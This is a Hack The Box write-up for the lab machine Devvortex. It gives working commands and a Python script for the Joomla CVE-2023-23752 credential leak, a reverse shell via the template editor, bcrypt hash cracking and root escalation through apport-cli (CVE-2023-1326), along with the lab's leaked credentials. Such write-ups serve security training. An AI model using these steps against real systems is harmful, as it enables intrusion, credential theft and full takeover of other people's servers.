Devvortex - HTB Writeup
Machine Info
Devvortex is an easy Linux machine. Initial access comes from CVE-2023-23752, an unauthenticated information disclosure in the Joomla web services API, and privilege escalation from CVE-2023-1326 in apport-cli.
User
Scanning through Nmap
First we scan the target with nmap to find the listening services. -p- covers all 65535 TCP ports, and --min-rate 10000 forces nmap to send at least that many packets per second, which makes a full sweep fast enough to be practical. The result is written to a file, and a short pipeline pulls out just the open port numbers so they can be fed into the follow-up scan.
$ nmap -p- --min-rate 10000 10.129.229.146 -oN ini.txt && grep -E '^[0-9]+/tcp +open' ini.txt | cut -d '/' -f1 | paste -sd ','
22,80
Now let's run a deeper scan on just these two ports:
$ nmap -p22,80 -sC -sV -A -T4 10.129.229.146 -oN scan.txt
- -sC runs the default NSE scripts
- -sV probes for service and version information
- -A enables OS detection, version detection, script scanning and traceroute in one flag
- -T4 selects the "aggressive" timing template, faster than the default on a reliable network
- -oN writes the result in normal format to the given file
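As an added example that is not part of the original writeup, the following Python script does the port extraction and builds the follow-up scan command robustly: it parses normal-format (-oN) nmap output, keeps only TCP ports whose state is open, and turns them into the -p argument. The nmap output embedded in it is constructed for offline use; pass a real -oN file as the first argument and the target as the second to use it for real.

```python
import re
import sys

# Constructed sample of `nmap -p- -oN` normal-format output (not the scan from the
# writeup). It includes header/footer lines and a non-open port that must be dropped.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated Sun Nov 26 10:00:00 2023 as: nmap -p- --min-rate 10000 -oN ini.txt 10.129.229.146
Nmap scan report for 10.129.229.146
Host is up (0.045s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
443/tcp filtered https

# Nmap done at Sun Nov 26 10:00:07 2023 -- 1 IP address (1 host up) scanned in 7.12 seconds
"""

# Matches only lines of the form "PORT/PROTO STATE SERVICE ..."
PORT_LINE = re.compile(r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)")


def open_ports(nmap_output: str, proto: str = "tcp") -> list[int]:
    """Return the sorted open ports for `proto` from nmap -oN text.

    Header, 'Not shown' and footer lines never match PORT_LINE, so they cannot leak
    into the result, and ports in any state other than 'open' are ignored.
    """
    ports = set()
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group("proto") == proto and m.group("state") == "open":
            ports.add(int(m.group("port")))
    return sorted(ports)


def port_spec(ports: list[int]) -> str:
    """Format a port list as nmap's -p argument, e.g. '22,80'."""
    return ",".join(str(p) for p in ports)


def detail_scan_command(target: str, ports: list[int], out_file: str = "scan.txt") -> list[str]:
    """Build the follow-up scan used in the writeup (-sC -sV -A -T4) as an argv list."""
    if not ports:
        raise ValueError("no open ports to scan")
    return ["nmap", "-p" + port_spec(ports), "-sC", "-sV", "-A", "-T4", target, "-oN", out_file]


if __name__ == "__main__":
    # Usage: python3 ports.py ini.txt 10.129.229.146
    # With no arguments the constructed sample above is parsed instead.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    target = sys.argv[2] if len(sys.argv) > 2 else "10.129.229.146"
    ports = open_ports(text)
    print(port_spec(ports))
    print(" ".join(detail_scan_command(target, ports)))
```

Restricting the match to lines that start with a port number is what makes this safe against the header and summary lines that a plain cut over the whole file would also pick up.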
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Information Gathering
Only two ports are open: 22 (SSH) and 80 (HTTP). The OpenSSH banner tells us the target is running Ubuntu. Port 80 serves nginx 1.18.0, which on its own gives us no useful foothold. Nmap also shows that the site redirects to devvortex.htb, so we add that name to our local DNS file, /etc/hosts, so the browser can resolve it.
$ echo "10.129.229.146 devvortex.htb" | sudo tee -a /etc/hosts
Web Testing
Port 80 hosts the website of a software house that offers web development services.
Tech Stack
The Server header reports nginx/1.18.0 on Ubuntu, nothing special.
HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Last-Modified: Tue, 12 Sep 2023 17:45:54 GMT
Connection: close
ETag: "6500a3d2-4680"
Directory brute-forcing on the main site turned up nothing special, so I moved on to subdomain enumeration with ffuf (wfuzz or gobuster work just as well), fuzzing the Host header with the SecLists wordlist /seclists/Discovery/DNS/subdomains-top1million-110000.txt.
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200 -s
# Output
dev
- -w for wordlist
- -u for url
- -H for Host header
- -mc for match response code
- -s for silent mode, not to print banner and status
ffuf finds a subdomain called dev. Let's add it to /etc/hosts as well.
# append dev.devvortex.htb to the existing devvortex.htb line
$ sudo sed -i '/devvortex\.htb/ s/$/ dev.devvortex.htb/' /etc/hosts
The dev site looks like another software company website. Let's directory-bust this subdomain, again with ffuf because it is robust and fast.
$ ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,301 -s
- -u for url
- -w for wordlist
- -mc to print only specified status code
- -s for silent mode, not to print banner
Ffuf found some directory paths for us.
images
media
language
plugins
tmp
cache
includes
templates
modules
components
administrator
libraries
api
home
layouts
The administrator path looks interesting. Visiting it shows a Joomla login page.
Joomla is an open source content management system (CMS) used to build websites and online applications. It is free and extensible, and it is split into a public front end and an administrator back end.
Let's run joomscan to find the Joomla version and check whether it is a vulnerable one. Joomscan reports Joomla 4.2.6 on the target.
$ joomscan -u http://dev.devvortex.htb
A quick search reveals that Joomla 4.2.6 is vulnerable to CVE-2023-23752, an unauthenticated information disclosure: an improper access check in the web services API lets anyone read endpoints under /api/index.php/v1/ that should require authentication simply by appending ?public=true. The users endpoint leaks the account list, so we request curl -v http://dev.devvortex.htb/api/index.php/v1/users?public=true to get the usernames.
lewis@devvortex.htb
logan@devvortex.htb
To leak the database credentials we query the application config endpoint the same way, making sure to use the dev vhost rather than the bare IP: curl -v http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
lewis : P4ntherg0t1n5r3c0n##
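As an added example that is not part of the original writeup, the following Python script queries both endpoints and parses the JSON:API responses: the users list yields usernames, e-mails and groups, and the application config comes back as one data item per configuration key, so it is flattened into a single dict before the database user and password are read out. The embedded responses are constructed in that shape for offline use (values mirror the writeup where it shows them); the endpoint paths are the two above, and the base URL is passed on the command line.

```python
import json
import sys
import urllib.request
from typing import Any

# Endpoints of the Joomla web services API that CVE-2023-23752 exposes without
# authentication when ?public=true is appended (Joomla 4.0.0 - 4.2.7).
USERS_ENDPOINT = "/api/index.php/v1/users?public=true"
CONFIG_ENDPOINT = "/api/index.php/v1/config/application?public=true"

# Constructed responses in the JSON:API shape Joomla returns; not a captured exchange.
# Values mirror what the writeup shows where it shows them.
SAMPLE_USERS = json.dumps({
    "data": [
        {"type": "users", "id": "649", "attributes": {
            "id": 649, "name": "lewis", "username": "lewis",
            "email": "lewis@devvortex.htb", "block": 0, "group_names": "Super Users"}},
        {"type": "users", "id": "650", "attributes": {
            "id": 650, "name": "logan paul", "username": "logan",
            "email": "logan@devvortex.htb", "block": 0, "group_names": "Registered"}},
    ]
})

# The config endpoint returns one data item per configuration key, so the database
# settings are spread over several items and have to be merged.
SAMPLE_CONFIG = json.dumps({
    "data": [
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "P4ntherg0t1n5r3c0n##", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
    ]
})


def parse_users(body: str) -> list[dict[str, Any]]:
    """Extract username, e-mail and group membership from a /v1/users response."""
    users = []
    for item in json.loads(body).get("data", []):
        attrs = item.get("attributes", {})
        users.append({"username": attrs.get("username"),
                      "email": attrs.get("email"),
                      "groups": attrs.get("group_names")})
    return users


def parse_config(body: str) -> dict[str, Any]:
    """Flatten the per-key data items of /v1/config/application into one dict."""
    merged: dict[str, Any] = {}
    for item in json.loads(body).get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key != "id":  # every item repeats the application id; drop it
                merged[key] = value
    return merged


def db_credentials(config: dict[str, Any]) -> str:
    """Render the DB login as 'user : password'; fail loudly if the leak did not happen."""
    missing = [k for k in ("user", "password") if k not in config]
    if missing:
        raise KeyError(f"config response lacks {missing}; the target may be patched")
    return f"{config['user']} : {config['password']}"


def fetch(base_url: str, path: str, timeout: int = 10) -> str:
    """GET base_url + path. Use the vhost (http://dev.devvortex.htb), not the bare IP:
    nginx picks the Joomla site by Host header."""
    req = urllib.request.Request(base_url.rstrip("/") + path,
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Usage: python3 joomla_leak.py http://dev.devvortex.htb
    # With no argument, the constructed samples are parsed instead of a live target.
    if len(sys.argv) > 1:
        users_body = fetch(sys.argv[1], USERS_ENDPOINT)
        config_body = fetch(sys.argv[1], CONFIG_ENDPOINT)
    else:
        users_body, config_body = SAMPLE_USERS, SAMPLE_CONFIG
    for user in parse_users(users_body):
        print(f"{user['username']:<10} {user['email']:<28} {user['groups']}")
    cfg = parse_config(config_body)
    print(db_credentials(cfg), "on", f"{cfg.get('host')}/{cfg.get('db')}", "prefix", cfg.get("dbprefix"))
```

The dbprefix value is worth keeping: it is what tells you the users table will be called sd4fg_users once you reach the database.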
The database password is reused by lewis, who is an administrator in the Joomla back end. Log in at /administrator with lewis : P4ntherg0t1n5r3c0n## and, through the template editor, put a PHP reverse shell into a template file such as error.php to get an initial foothold on the box.
Requesting the modified error.php in the browser immediately gives us a shell as www-data.
/etc/passwd shows only two other accounts with a login shell, and as www-data we cannot read either home directory:
logan
root
Checking the listening sockets shows that MySQL (port 3306) is listening on localhost only:
1
$ ss -lntp
- -l for list the listening ports
- -n for numeric port number, not the service name
- -t to list the tcp ports
- -p to list the processes
Let's use the database credentials leaked through the Joomla API to dump the database. MySQL is bound to localhost only, which is why the external scan never showed port 3306, so we connect from the shell we already have on the box.
lewis : P4ntherg0t1n5r3c0n##
$ mysql -h localhost -u lewis -p joomla
There are bunch of tables present in joomla database. The most interesting one is sd4fg_users. Let’s dump it and see what’s inside it.
The table holds bcrypt password hashes for both lewis and logan. Save them to a file and crack them with hashcat (mode 3200 is bcrypt).
lewis : $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan : $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
$ hashcat -m 3200 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho
Shell as Logan
Now we have a username and password. Let's get a shell over SSH on the target system.
$ sshpass -p tequieromucho ssh logan@devvortex.htb
Privilege Escalation
sudo -l shows that logan can run apport-cli as root. The installed version is 2.20.11.
A quick search reveals a local privilege escalation in apport-cli: CVE-2023-1326.
According to the advisory, if a system is configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set, a local attacker can escalate privilege. The reason is that apport-cli hands the report to less while still running as root, and less can spawn a shell with its ! command.
Exploitation
First we need a crash report for apport-cli to open. Start a background process and kill it with SIGSEGV so apport writes a .crash file under /var/crash, then hand that file to apport-cli via sudo and choose V (view report) at the prompt.
$ sleep 60 &
$ kill -SIGSEGV $!
$ sudo apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
Once the report opens in less, type ! and press Enter: less spawns a shell, and because apport-cli is running under sudo, that shell is root. The report has to be paged through less for this to work, which is why the advisory mentions the terminal size; if the whole report fits on one screen, shrink the terminal before pressing V.